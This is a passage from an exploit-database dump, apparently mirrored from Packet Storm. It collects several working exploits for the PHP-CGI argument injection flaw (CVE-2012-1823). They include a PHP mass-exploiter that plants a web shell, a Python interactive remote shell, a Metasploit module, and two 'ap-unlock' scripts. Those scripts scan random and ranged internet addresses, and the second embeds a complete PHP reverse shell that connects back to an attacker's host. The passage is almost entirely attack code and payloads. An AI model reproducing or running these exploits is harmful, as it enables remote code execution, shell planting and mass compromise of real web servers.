==''){$path = \"/\"; } \nif ($proxy=='') {$p=$path;} else {$p='http://'.$host.$path;} \n \n/* Checking \nAvailability */ \n \n$connection = fsockopen($host,$port); \nif (!$connection) \n// site is down \n{ \necho '<font color=red> No response from \n'.htmlentities($host).' ...<br></font>'; \n \nfile_put_contents(realpath(dirname(__FILE__)).'/notconnected.txt', \n$siteAddbackup.\"\\r\\n\", FILE_APPEND); \n} \nelse \n// site is up \n{ \nfclose($connection); \nExploitable($host,$path,$p); \n} \n \n} \n} \n \nFunction Exploitable($host,$path,$p) \n{ \nglobal $html; \n$i=0; \n/* Checking Exploitability */ \n$packet = \"GET \".$p.\"?-s HTTP/1.1\\r\\n\"; \n$packet .= \"Host: \".$host.\"\\r\\n\"; \n$packet .= \"User-Agent: PHP CGI Argument Injection Exploiter \\r\\n\\r\\n\"; \nsendpacket($packet,1,0,0); \n$str = array( \n'<code><span','<?'); \nforeach ($str as $value => $search){ \nif(stristr($html, $search) == TRUE) \n{$i=$i+1;}} \nswitch($i) \n{ \ncase 0: \necho '<font color=red>'.$host.' Faild!<br></font>'; \nbreak; \ncase 2: \necho '<font color=#FFF8C6>'.$host.' Exploitable<br></font>'; \nExploit($host,$path,$p); \n} \n} \n \nFunction Exploit($host,$path,$p) \n{ \nglobal $html, $shell; \n/* Exploiting */ \n \n$payload = \"<?php \\$myFile = \\\"legalpentest.php\\\"; \\$filehandle = \nfopen(\\$myFile, 'w') or die(\\\"can't open file\\\"); \\$Data=$shell; \nfwrite(\\$filehandle, \\$Data);fclose(\\$filehandle);\"; \n$packet = \"POST \n\".$p.\"/?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input \nHTTP/1.1\\r\\n\"; \n$packet .= \"Host: \".$host.\"\\r\\n\"; \n$packet .= \"User-Agent: PHP CGI Argument Injection Exploiter\\r\\n\"; \n$packet .= \"Content-Type: application/x-www-form-urlencoded\\r\\n\"; \n$packet .= \"Content-Length: \".strlen($payload).\"\\r\\n\\r\\n\"; \n$packet .= $payload.\"\\r\\n\\r\\n\\r\\n\\r\\n\"; \nsendpacket($packet,1,0,0); \n/* Check for successfully \nuploaded */ \n$packet = \"HEAD \".$p.\"/legalpentest.php HTTP/1.1\\r\\n\"; \n$packet .= \"Host: \".$host.\"\\r\\n\"; \n$packet .= \"User-Agent: :) \\r\\n\\r\\n\"; \nsendpacket($packet,1,0,0); \n \nif(stristr($html , '404 Not Found') == true) \n{ \necho '<font color=#FFF8C6><br>Exploit \nFaild...<br>-------------------------------------------------------<br></font>'; \n} \nelse { \necho \"<font color=#FFF8C6><br>Exploit \nSucceeded...<br>http://$host$path\".\"/legalpentest.php<br>-------------------------------------------------------<br></font>\"; \nfile_put_contents(realpath(dirname(__FILE__)).'/shell.txt', \n\"http://$host$path\".\"/legalpentest.php\\r\\n\", FILE_APPEND); \n} \n} \n \n \nfunction sendpacket($packet,$response = 0,$output = 0,$s=0) \n{ \n$proxy_regex = '(\\b\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\:\\d{1,5}\\b)'; \nglobal $proxy, $host, $port, $html, $user, $pass; \nif ($proxy == '') \n{ \n$ock = fsockopen($host,$port); \nstream_set_timeout($ock, 5); \nif (!$ock) \n{ \necho 'No response from '.htmlentities($host).' ...<br>'; \nstream_set_timeout($ock, 4); \n} \n} else \n{ \n$parts = explode(':',$proxy); \n// echo '<font color=white>Connecting to proxy: \n'.$parts[0].':'.$parts[1].' ...<br><br/></font>'; \n$ock = fsockopen($parts[0],$parts[1]); \nstream_set_timeout($ock, 5); \nif (!$ock) \n{ \necho 'No response from proxy...<br>'; \nfclose($ock); \n} \n} \n \nif ($ock) \n{ \nfputs($ock,$packet); \nif ($response == 1) \n{ \nif ($proxy == '') \n{ \n$html = ''; \nwhile (!feof($ock)) \n{ \n$html .= fgets($ock); \n} \n} else \n{ \n$html = ''; \nwhile ((!feof($ock)) or \n(!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) \n{ \n$html .= fread($ock,1); \n} \n} \n} else $html = ''; \n \nfclose($ock); \n} \n} \n?> \n`\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/112971/phpcgi-exploit.txt"}, {"lastseen": "2016-12-05T22:23:14", "bulletinFamily": "exploit", "description": "", "modified": "2012-12-24T00:00:00", "published": "2012-12-24T00:00:00", "href": "https://packetstormsecurity.com/files/119075/PHP-CGI-Argument-Injection-Remote-Code-Execution.html", "id": "PACKETSTORM:119075", "type": "packetstorm", "title": "PHP-CGI Argument Injection Remote Code Execution", "sourceData": "`#!/usr/bin/python \nimport requests \nimport sys \n \nprint \"\"\" \nCVE-2012-1823 PHP-CGI Arguement Injection Remote Code Execution \nThis exploit abuses an arguement injection in the PHP-CGI wrapper \nto execute code as the PHP user/webserver user. \nFeel free to give me abuse about this <3 \n- infodox | insecurety.net | @info_dox \n\"\"\" \n \nif len(sys.argv) != 2: \nprint \"Usage: ./cve-2012-1823.py <target>\" \nsys.exit(0) \n \ntarget = sys.argv[1] \nurl = \"\"\"http://\"\"\" + target + \"\"\"/?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input\"\"\" \nlol = \"\"\"<?php system('\"\"\" \nlol2 = \"\"\"');die(); ?>\"\"\" \nprint \"[+] Connecting and spawning a shell...\" \nwhile True: \ntry: \nbobcat = raw_input(\"%s:~$ \" %(target)) \nlulz = lol + bobcat + lol2 \nhax = requests.post(url, lulz) \nprint hax.text \nexcept KeyboardInterrupt: \nprint \"\\n[-] Quitting\" \nsys.exit(1) \n \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/119075/cve-2012-1823.py.txt", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-12-05T22:20:30", "bulletinFamily": "exploit", "description": "", "modified": "2012-05-06T00:00:00", "published": "2012-05-06T00:00:00", "href": "https://packetstormsecurity.com/files/112477/PHP-CGI-Argument-Injection.html", "id": "PACKETSTORM:112477", "type": "packetstorm", "title": "PHP CGI Argument Injection", "sourceData": "`## \n# $Id$ \n## \n \n## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# web site for more information on licensing and terms of use. \n# http://metasploit.com/ \n## \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = ExcellentRanking \n \ninclude Msf::Exploit::Remote::HttpClient \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'PHP CGI Argument Injection', \n'Description' => %q{ \nWhen run as a CGI, PHP up to version 5.3.12 and 5.4.2 is vulnerable to \nan argument injection vulnerability. This module takes advantage of \nthe -d flag to set php.ini directives to achieve code execution. \nFrom the advisory: \"if there is NO unescaped '=' in the query string, \nthe string is split on '+' (encoded space) characters, urldecoded, \npassed to a function that escapes shell metacharacters (the \"encoded in \na system-defined manner\" from the RFC) and then passes them to the CGI \nbinary.\" \n}, \n'Author' => [ 'egypt', 'hdm' ], \n'License' => MSF_LICENSE, \n'Version' => '$Revision$', \n'References' => [ \n[ 'CVE' , '2012-1823' ], \n[ 'OSVDB', '81633'], \n[ 'URL' , 'http://eindbazen.net/2012/05/php-cgi-advisory-cve-2012-1823/' ], \n], \n'Privileged' => false, \n'Payload' => \n{ \n'DisableNops' => true, \n# Arbitrary big number. The payload gets sent as an HTTP \n# response body, so really it's unlimited \n'Space' => 262144, # 256k \n}, \n'DisclosureDate' => 'May 03 2012', \n'Platform' => 'php', \n'Arch' => ARCH_PHP, \n'Targets' => [[ 'Automatic', { }]], \n'DefaultTarget' => 0)) \n \nregister_options([ \nOptString.new('TARGETURI', [false, \"The URI to request (must be a CGI-handled PHP script)\"]), \n], self.class) \nend \n \n# php-cgi -h \n# ... \n# -s Display colour syntax highlighted source. \ndef check \nuri = target_uri.path \n \nuri.gsub!(/\\?.*/, \"\") \n \nprint_status(\"Checking uri #{uri}\") \n \nresponse = send_request_raw({ 'uri' => uri }) \n \nif response and response.code == 200 and response.body =~ /\\<code\\>\\<span style.*\\&lt\\;\\?/mi \nprint_error(\"Server responded in a way that was ambiguous, could not determine whether it was vulnerable\") \nreturn Exploit::CheckCode::Unknown \nend \n \nresponse = send_request_raw({ 'uri' => uri + '?-s'}) \nif response and response.code == 200 and response.body =~ /\\<code\\>\\<span style.*\\&lt\\;\\?/mi \nreturn Exploit::CheckCode::Vulnerable \nend \n \nprint_error(\"Server responded indicating it was not vulnerable\") \nreturn Exploit::CheckCode::Safe \nend \n \ndef exploit \nbegin \nargs = [ \n\"-d+allow_url_include%3d#{rand_php_ini_true}\", \n\"-d+safe_mode%3d#{rand_php_ini_false}\", \n\"-d+suhosin.simulation%3d#{rand_php_ini_true}\", \n\"-d+disable_functions%3d%22%22\", \n\"-d+open_basedir%3dnone\", \n\"-d+auto_prepend_file%3dphp://input\", \n\"-n\" \n] \n \nqs = args.join(\"+\") \nuri = \"#{target_uri}?#{qs}\" \n \n# Has to be all on one line, so gsub out the comments and the newlines \npayload_oneline = \"<?php \" + payload.encoded.gsub(/\\s*#.*$/, \"\").gsub(\"\\n\", \"\") \nresponse = send_request_cgi( { \n'method' => \"POST\", \n'global' => true, \n'uri' => uri, \n'data' => payload_oneline, \n}, 0.5) \nhandler \n \nrescue ::Interrupt \nraise $! \nrescue ::Rex::HostUnreachable, ::Rex::ConnectionRefused \nprint_error(\"The target service unreachable\") \nrescue ::OpenSSL::SSL::SSLError \nprint_error(\"The target failed to negotiate SSL, is this really an SSL service?\") \nend \n \nend \n \ndef rand_php_ini_false \nRex::Text.to_rand_case([ \"0\", \"off\", \"false\" ][rand(3)]) \nend \n \ndef rand_php_ini_true \nRex::Text.to_rand_case([ \"1\", \"on\", \"true\" ][rand(3)]) \nend \n \nend \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/112477/php_cgi_arg_injection.rb.txt", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-12-05T22:24:41", "bulletinFamily": "exploit", "description": "", "modified": "2013-10-29T00:00:00", "published": "2013-10-29T00:00:00", "href": "https://packetstormsecurity.com/files/123833/Apache-PHP-Remote-Command-Execution.html", "id": "PACKETSTORM:123833", "type": "packetstorm", "title": "Apache / PHP Remote Command Execution", "sourceData": "`#!/usr/bin/env python \n# \n# ap-unlock.py - apache + php 5.* rem0te c0de execution 0day \n# \n# NOTE: \n# - quick'n'dirty \n# - '-x' is missing. copy&paste connect-back shell php code from kingcope's \n# exploit: http://www.exploit-db.com/exploits/29290/ \n# - scanner is not multithreaded. as alternative use: \n# ./pnscan -L10000 -w\"GET /cgi-bin/php HTTP/1.0\\r\\n\\r\\n\" -r \"500 \n# Internal\" <cidrrange> 80 | grep Apache (or get *scan, harhar) \n# \n# by noptrix - http://nullsecurity.net/ \n \nimport sys \nimport socket \nimport argparse \nimport threading \nimport time \nimport random \nimport select \n \nt3st = 'POST /cgi-bin/php/%63%67%69%6E/%70%68%70?%2D%64+%61%6C%75%6F%6E+%2D' \\ \n'%64+%6D%6F%64+%2D%64+%73%75%68%6F%6E%3D%6F%6E+%2D%64+%75%6E%63%74%73' \\ \n'%3D%22%22+%2D%64+%64%6E%65+%2D%64+%61%75%74%6F%5F%70%72%%74+%2D%64+' \\ \n'%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+'\\ \n'%74%5F%3D%30+%2D%64+%75%74+%2D%6E HTTP/1.1\\r\\nHost:localhost\\r\\n'\\ \n'Content-Type: text/html\\r\\nContent-Length:1\\r\\n\\r\\na\\r\\n' \n \ndef enc0dez(): \nn33dz1 = ('cgi-bin', 'php') \nn33dz2 = ('-d', 'allow_url_include=on', '-d', 'safe_mode=off', '-d', \n'suhosin.simulation=on', '-d', 'disable_functions=\"\"', '-d', \n'open_basedir=none', '-d', 'auto_prepend_file=php://input', \n'-d', 'cgi.force_redirect=0', '-d', 'cgi.redirect_status_env=0', \n'-d', 'auto_prepend_file=php://input', '-n') \nfl4g = 0 \narg5 = '' \np4th = '' \nplus = '' \n \nfor x in n33dz2: \nif fl4g == 1: \nplus = '+' \narg5 = arg5 + plus + \\ \n''.join('%' + c.encode('utf-8').encode('hex') for c in x) \nfl4g = 1 \nfor x in n33dz1: \np4th = p4th + '/' + \\ \n''.join('%' + c.encode('utf-8').encode('hex') for c in x) \nreturn (p4th.upper(), arg5.upper()) \n \ndef m4k3_p4yl0rd(p4yl0rd, vuln): \np4th, arg5 = enc0dez() \nif vuln: \np4yl0rd = t3st \nelse: \np4yl0rd = 'POST /' + p4th + '?' + arg5 + ' HTTP/1.1\\r\\n' \\ \n'Host: ' + sys.argv[1] + '\\r\\n' \\ \n'Content-Type: application/x-www-form-urlencoded\\r\\n' \\ \n'Content-Length: ' + str(len(p4yl0rd)) + '\\r\\n\\r\\n' + p4yl0rd \nreturn p4yl0rd \n \ndef s3nd_sh1t(args, vuln): \npat = '<b>Parse error</b>:' \ntry: \ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM) \ns.settimeout(float(args.t)) \nres = s.connect_ex((args.h, int(args.p))) \nif res == 0: \nif vuln: \np4yl0rd = m4k3_p4yl0rd('', vuln) \ns.sendall(p4yl0rd) \ndata = s.recv(4096) \nif pat in data: \nprint \"[*] \" + args.h + \" vu1n\" \nreturn args.h \nreturn \nelse: \np4yl0rd = m4k3_p4yl0rd('<? system(\"' + args.c + '\"); ?>', vuln) \ns.sendall(p4yl0rd) \nwhile True: \nrd, wd, ex = select.select([s], [], [], float(args.t)) \nif rd: \ndata = s.recv(4096) \nsys.stdout.flush() \nsys.stdout.write(data) \nsys.stdout.write('\\n') \nelse: \nreturn \n#for line in s.makefile(): \n# print line, \nexcept socket.error: \nreturn \nreturn \n \ndef m4k3_r4nd_1p4ddr(num): \nh0sts = [] \nfor x in range(int(num)): \nh0sts.append('%d.%d.%d.%d' % (random.randrange(0,255), \nrandom.randrange(0,255), random.randrange(0,255), \nrandom.randrange(0,255))) \nreturn h0sts \n \ndef sc4n_r4ng3(rsa, rsb, args, vuln): \nvu1nz = [] \nfor i in range (rsa[0], rsb[0]): \nfor j in range (rsa[1], rsb[1]): \nfor k in range (rsa[2], rsb[2]): \nfor l in range(rsa[3], rsb[3]): \nargs.h = str(i) + \".\" + str(j) + \".\" + str(k) + \".\" + str(l) \nvu1nz.append(s3nd_sh1t(args, vuln)) \ntime.sleep(0.005) \nvu1nz = filter(None, vu1nz) \nreturn vu1nz \n \ndef m4k3_ipv4_r4ng3(iprange): \na = tuple(part for part in iprange.split('.')) \nrsa = (range(4)) \nrsb = (range(4)) \nfor i in range(0,4): \nga = a[i].find('-') \nif ga != -1: \nrsa[i] = int(a[i][:ga]) \nrsb[i] = int(a[i][1+ga:]) + 1 \nelse: \nrsa[i] = int(a[i]) \nrsb[i] = int(a[i]) + 1 \nreturn (rsa, rsb) \n \ndef parse_args(): \np = argparse.ArgumentParser( \nusage='\\n\\n ./ap-unlock.py -h <4rg> -s | -c <4rg> | -x <4rg> [0pt1ons]' \\ \n'\\n ./ap-unlock.py -r <4rg> | -R <4rg> [0pt1ons]', \nformatter_class=argparse.RawDescriptionHelpFormatter, add_help=False) \nopts = p.add_argument_group('0pt1ons', '') \nopts.add_argument('-h', metavar='wh1t3h4tz.0rg', \nhelp='| t3st s1ngle h0st f0r vu1n') \nopts.add_argument('-p', default=80, metavar='80', \nhelp='| t4rg3t p0rt (d3fau1t: 80)') \nopts.add_argument('-c', metavar='\\'uname -a;id\\'', \nhelp='| s3nd c0mm4nds t0 h0st') \nopts.add_argument('-x', metavar='192.168.0.2 1337', \nhelp='| c0nn3ct b4ck h0st 4nd p0rt f0r sh3ll') \nopts.add_argument('-s', action='store_true', \nhelp='| t3st s1ngl3 h0st f0r vu1n') \nopts.add_argument('-r', metavar='133.1.3-7.7-37', \nhelp='| sc4nz iP addr3ss r4ng3 f0r vu1n') \nopts.add_argument('-R', metavar='1337', \nhelp='| sc4nz num r4nd0m h0st5 f0r vu1n') \nopts.add_argument('-t', default=3, metavar='3', \nhelp='| t1me0ut in s3x (d3fau1t: 3)') \nopts.add_argument('-f', metavar='vu1n.lst', \nhelp='| wr1t3 vu1n h0sts t0 f1l3') \nargs = p.parse_args() \nif not args.h and not args.r and not args.R: \np.print_help() \nsys.exit(0) \nreturn args \n \ndef m41n(): \nif __name__ == \"__main__\": \nprint \"--==[ ap-unlock.py by noptrix@nullsecurity.net ]==--\" \nvuln = 0 \ntry: \nargs = parse_args() \nif not args.t: \nargs.t = float(3) \nif args.h: \nif args.s: \nprint \"[+] sc4nn1ng s1ngl3 h0st %s \" % (args.h) \nvuln = 1 \ns3nd_sh1t(args, vuln) \nelif args.c: \nprint \"[+] s3nd1ng c0mm4ndz t0 h0st %s \" % (args.h) \ns3nd_sh1t(args, vuln) \nelif args.x: \nprint \"[+] xpl0it1ng b0x %s \" % (args.h) \nprint \"t0d0\" \nelse: \nprint \"[-] 3rr0r: m1ss1ng -s, -c 0r -x b1tch\" \nsys.exit(-1) \nif args.r: \nprint \"[+] sc4nn1ng r4ng3 %s \" % (args.r) \nvuln = 1 \nrsa, rsb = m4k3_ipv4_r4ng3(args.r) \nvu1nz = sc4n_r4ng3(rsa, rsb, args, vuln) \nif args.R: \nprint \"[+] sc4nn1ng %d r4nd0m b0xes\" % (int(args.R)) \nvuln = 1 \nh0sts = m4k3_r4nd_1p4ddr(int(args.R)) \nfor h0st in h0sts: \nargs.h = h0st \ns3nd_sh1t(args, vuln) \nexcept KeyboardInterrupt: \nsys.stdout.flush() \nsys.stderr.write(\"\\b\\b[!] w4rn1ng: ab0rt3d bY us3r\\n\") \nraise SystemExit \nif args.f: \nif vu1nz: \nf = open(args.f, \"w\") \nf.write(\"\\n\".join(vu1nz)+\"\\n\") \nf.close() \nelse: \nprint \"[-] 3rr0r: y0u fuck3d up dud3\" \nsys.exit(1) \nprint \"[+] h0p3 1t h3lp3d\" \n \nm41n() \n`\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/123833/ap-unlock.py.txt"}, {"lastseen": "2016-12-05T22:13:04", "bulletinFamily": "exploit", "description": "", "modified": "2013-10-31T00:00:00", "published": "2013-10-31T00:00:00", "href": "https://packetstormsecurity.com/files/123859/Apache-PHP-5.x-Remote-Code-Execution-Python-Exploit-2.html", "id": "PACKETSTORM:123859", "type": "packetstorm", "title": "Apache + PHP 5.x Remote Code Execution Python Exploit #2", "sourceData": "`#!/usr/bin/env python \n# \n# ap-unlock-v2.py - apache + php 5.* rem0te c0de execution 0day (better version) \n# \n# NOTE: \n# - quick'n'dirty VERY UGLYY C=000DEEE IZ N0T MY STYLE :((( \n# - for connect back shell start netcat/nc and bind port on given host:port \n# - is ip-range scanner not is multithreaded, but iz multithreaded iz in \n# random scanner and is scanner from file (greets to MustLive) \n# - no ssl support \n# - more php paths can be added \n# - adjust this shit for windows b0xes \n# \n# 2013 \n# by noptrix - http://nullsecurity.net/ \n \nimport sys \nimport socket \nimport argparse \nimport threading \nimport time \nimport random \nimport select \n \n \nNONE = 0 \nVULN = 1 \nSCMD = 2 \nXPLT = 3 \n \nt3st = 'POST /cgi-bin/php/%63%67%69%6E/%70%68%70?%2D%64+%61%6C%75%6F%6E+%2D' \\ \n'%64+%6D%6F%64+%2D%64+%73%75%68%6F%6E%3D%6F%6E+%2D%64+%75%6E%63%74%73' \\ \n'%3D%22%22+%2D%64+%64%6E%65+%2D%64+%61%75%74%6F%5F%70%72%%74+%2D%64+' \\ \n'%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+'\\ \n'%74%5F%3D%30+%2D%64+%75%74+%2D%6E HTTP/1.1\\r\\nHost:localhost\\r\\n'\\ \n'Content-Type: text/html\\r\\nContent-Length:1\\r\\n\\r\\na\\r\\n' \n \n \ndef m4ke_c0nn_b4ck_sh1t(cb_h0st, cb_p0rt): \nc0nn_b4ck = \\ \n''' \n<? set_time_limit (0); $VERSION = \"1.0\"; $ip = \"''' + cb_h0st + '''\"; \n$port = ''' + cb_p0rt + '''; $chunk_size = 1400; $write_a = null; \n$error_a = null; $shell = \"unset HISTFILE; id; /bin/sh -i\"; $daemon = 0; \n$debug = 0; if (function_exists(\"pcntl_fork\")) {$pid = pcntl_fork(); \nif ($pid == -1) {exit(1);}if ($pid) {exit(0);}if (posix_setsid() == -1) { \nexit(1);}$daemon = 1;} else {print \"bla\";}chdir(\"/\");umask(0); \n$sock = fsockopen($ip, $port, $errno, $errstr, 30);if (!$sock) { \nprintit(\"$errstr ($errno)\");exit(1);}$descriptorspec = array( \n0 => array(\"pipe\", \"r\"), 1 => array(\"pipe\", \"w\"),2 => array(\"pipe\", \"w\")); \n$process = proc_open($shell, $descriptorspec, $pipes); \nif (!is_resource($process)) {exit(1);}stream_set_blocking($pipes[1], 0); \nstream_set_blocking($pipes[2], 0);stream_set_blocking($sock, 0); \nprintit(\"Successfully opened reverse shell to $ip:$port\");while (1) { \nif (feof($sock)) {printit(\"ERROR: Shell connection terminated\");break;} \nif (feof($pipes[1])) {printit(\"ERROR: Shell process terminated\");break;} \n$read_a = array($sock, $pipes[1], $pipes[2]); \n$num_changed_sockets = stream_select($read_a, $write_a, $error_a, null); \nif (in_array($sock, $read_a)) {if ($debug) printit(\"SOCK READ\"); \n$input = fread($sock, $chunk_size);if ($debug) printit(\"SOCK: $input\"); \nfwrite($pipes[0], $input);}if (in_array($pipes[1], $read_a)) { \nif ($debug) printit(\"STDOUT READ\");$input = fread($pipes[1], $chunk_size); \nif ($debug) printit(\"STDOUT: $input\");fwrite($sock, $input);} \nif (in_array($pipes[2], $read_a)) {if ($debug) printit(\"STDERR READ\"); \n$input = fread($pipes[2], $chunk_size); \nif ($debug) printit(\"STDERR: $input\");fwrite($sock, $input);}}fclose($sock); \nfclose($pipes[0]);fclose($pipes[1]);fclose($pipes[2]);proc_close($process); \nfunction printit ($string) {if (!$daemon) {print \"$string\\n\";}}?> \n''' \nreturn c0nn_b4ck \n \n \ndef enc0dez(): \nn33dz1 = ('cgi-bin', 'php') \nn33dz2 = ('-d', 'allow_url_include=on', '-d', 'safe_mode=off', '-d', \n'suhosin.simulation=on', '-d', 'disable_functions=\"\"', '-d', \n'open_basedir=none', '-d', 'auto_prepend_file=php://input', \n'-d', 'cgi.force_redirect=0', '-d', 'cgi.redirect_status_env=0', \n'-d', 'auto_prepend_file=php://input', '-n') \nfl4g = 0 \narg5 = '' \np4th = '' \nplus = '' \n \nfor x in n33dz2: \nif fl4g == 1: \nplus = '+' \narg5 = arg5 + plus + \\ \n''.join('%' + c.encode('utf-8').encode('hex') for c in x) \nfl4g = 1 \nfor x in n33dz1: \np4th = p4th + '/' + \\ \n''.join('%' + c.encode('utf-8').encode('hex') for c in x) \nreturn (p4th.upper(), arg5.upper()) \n \n \ndef m4k3_p4yl0rd(p4yl0rd, m0de): \np4th, arg5 = enc0dez() \nif m0de == VULN: \np4yl0rd = t3st \nelif m0de == SCMD or m0de == XPLT: \np4yl0rd = 'POST /' + p4th + '?' + arg5 + ' HTTP/1.1\\r\\n' \\ \n'Host: ' + sys.argv[1] + '\\r\\n' \\ \n'Content-Type: application/x-www-form-urlencoded\\r\\n' \\ \n'Content-Length: ' + str(len(p4yl0rd)) + '\\r\\n\\r\\n' + p4yl0rd \nreturn p4yl0rd \n \n \ndef s3nd_sh1t(args, m0de, c0nn_b4ck): \npat = '<b>Parse error</b>:' \ntry: \ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM) \ns.settimeout(float(args.t)) \nres = s.connect_ex((args.h, int(args.p))) \nif res == 0: \nif m0de == VULN: \np4yl0rd = m4k3_p4yl0rd('', m0de) \ns.sendall(p4yl0rd) \nif pat in s.recv(4096): \nprint \"--> \" + args.h + \" vu1n\" \nreturn args.h \nelse: \nif args.v: \nprint \"--> %s n0t vu1n\" % (args.h) \nreturn \nelif m0de == SCMD: \np4yl0rd = m4k3_p4yl0rd('<? system(\"' + args.c + '\"); ?>', m0de) \ns.sendall(p4yl0rd) \nrd, wd, ex = select.select([s], [], [], float(args.t)) \nif rd: \nfor line in s.makefile(): \nprint line, \nelif m0de == XPLT: \np4yl0rd = m4k3_p4yl0rd(c0nn_b4ck, m0de) \ns.sendall(p4yl0rd) \nelse: \nif args.v: \nprint \"--> n0 w3bs3rv3r 0n %s\" % (args.h) \nexcept socket.error: \nreturn \nreturn \n \n \ndef m4k3_r4nd_1p4ddr(num): \nh0sts = [] \nfor x in range(int(num)): \nh0sts.append('%d.%d.%d.%d' % (random.randrange(0,255), \nrandom.randrange(0,255), random.randrange(0,255), \nrandom.randrange(0,255))) \nreturn h0sts \n \n \ndef sc4n_r4nd0m(args, h0st, m0de, vu1nz): \nargs.h = h0st \nvu1nz.append(s3nd_sh1t(args, m0de, None)) \nvu1nz = filter(None, vu1nz) \nreturn \n \n \ndef sc4n_fr0m_f1le(args, h0st, m0de, vu1nz): \nargs.h = h0st.rstrip() \nvu1nz.append(s3nd_sh1t(args, m0de, None)) \nvu1nz = filter(None, vu1nz) \nreturn \n \n \ndef sc4n_r4ng3(rsa, rsb, args, m0de): \nvu1nz = [] \nfor i in range (rsa[0], rsb[0]): \nfor j in range (rsa[1], rsb[1]): \nfor k in range (rsa[2], rsb[2]): \nfor l in range(rsa[3], rsb[3]): \nargs.h = str(i) + \".\" + str(j) + \".\" + str(k) + \".\" + str(l) \nvu1nz.append(s3nd_sh1t(args, m0de, None)) \ntime.sleep(0.005) \nvu1nz = filter(None, vu1nz) \nreturn vu1nz \n \n \ndef m4k3_ipv4_r4ng3(iprange): \na = tuple(part for part in iprange.split('.')) \nrsa = (range(4)) \nrsb = (range(4)) \nfor i in range(0,4): \nga = a[i].find('-') \nif ga != -1: \nrsa[i] = int(a[i][:ga]) \nrsb[i] = int(a[i][1+ga:]) + 1 \nelse: \nrsa[i] = int(a[i]) \nrsb[i] = int(a[i]) + 1 \nreturn (rsa, rsb) \n \n \ndef parse_args(): \np = argparse.ArgumentParser( \nusage='\\n\\n ./ap-unlock-v2.py -h <4rg> -s | -c <4rg> | -x <4rg> [0pt1ons]'\\ \n'\\n ./ap-unlock-v2.py -r <4rg> | -R <4rg> | -i <4rg> [0pt1ons]', \nformatter_class=argparse.RawDescriptionHelpFormatter, add_help=False) \nopts = p.add_argument_group('0pt1ons', '') \nopts.add_argument('-h', metavar='wh1t3h4tz.0rg', \nhelp='| t3st s1ngle h0st f0r vu1n') \nopts.add_argument('-p', default=80, metavar='80', \nhelp='| t4rg3t p0rt (d3fau1t: 80)') \nopts.add_argument('-c', metavar='\\'uname -a;id\\'', \nhelp='| s3nd c0mm4nds t0 h0st') \nopts.add_argument('-x', metavar='192.168.0.2:1337', \nhelp='| c0nn3ct b4ck h0st 4nd p0rt f0r sh3ll') \nopts.add_argument('-s', action='store_true', \nhelp='| t3st s1ngl3 h0st f0r vu1n') \nopts.add_argument('-r', metavar='133.1.3-7.7-37', \nhelp='| sc4nz iP addr3ss r4ng3 f0r vu1n') \nopts.add_argument('-R', metavar='1337', \nhelp='| sc4nz num r4nd0m h0st5 f0r vu1n') \nopts.add_argument('-t', default=3, metavar='3', \nhelp='| t1me0ut in s3x (d3fau1t: 3)') \nopts.add_argument('-f', metavar='vu1n.lst', \nhelp='| wr1t3 vu1n h0sts t0 f1l3') \nopts.add_argument('-i', metavar='sc4nz.lst', \nhelp='| sc4nz h0sts fr0m f1le f0r vu1n') \nopts.add_argument('-S', metavar='2', \nhelp='| sl33pz in s3x b3tw33n thr3adz (d3fault: 2)') \nopts.add_argument('-T', default=2, metavar='4', \nhelp='| nuM sc4n thr3adz (d3fault: 4)') \nopts.add_argument('-v', action='store_true', \nhelp='| pr1nt m0ah 1nf0z wh1l3 sh1tt1ng') \nargs = p.parse_args() \nif not args.h and not args.r and not args.R and not args.i: \np.print_help() \nsys.exit(0) \nreturn args \n \n \ndef wr1te_fil3(args, vu1nz): \nif args.f: \nif vu1nz: \ntry: \nf = open(args.f, \"w\") \nf.write(\"\\n\".join(vu1nz)+\"\\n\") \nf.close() \nexcept: \nsys.stderr.write('de1n3 mudd1 k0cht guT') \nsys.stderr.write('\\n') \nraise SystemExit() \nreturn \n \n \ndef c0ntr0ller(): \nvu1nz = [] \nm0de = NONE \ntry: \nargs = parse_args() \nif not args.t: \nargs.t = float(3) \nif args.h: \nif args.s: \nprint \"[+] sc4nn1ng s1ngl3 h0st %s \" % (args.h) \nm0de = VULN \ns3nd_sh1t(args, m0de, None) \nelif args.c: \nprint \"[+] s3nd1ng c0mm4ndz t0 h0st %s \" % (args.h) \nm0de = SCMD \ns3nd_sh1t(args, m0de, None) \nelif args.x: \nprint \"[+] xpl0it1ng b0x %s \" % (args.h) \nm0de = XPLT \nif args.x.find(':') != -1: \nif not args.x.split(':')[1]: \nprint \"[-] 3rr0r: p0rt m1ss1ng\" \nelse: \ncb_h0st = args.x.split(':')[0] \ncb_p0rt = args.x.split(':')[1] \nelse: \nprint \"[-] 3rr0r: <h0st>:<p0rt> y0u l4m3r\" \nc0nn_b4ck = m4ke_c0nn_b4ck_sh1t(cb_h0st, cb_p0rt) \ns3nd_sh1t(args, m0de, c0nn_b4ck) \nelse: \nprint \"[-] 3rr0r: m1ss1ng -s, -c 0r -x b1tch\" \nsys.exit(-1) \nif 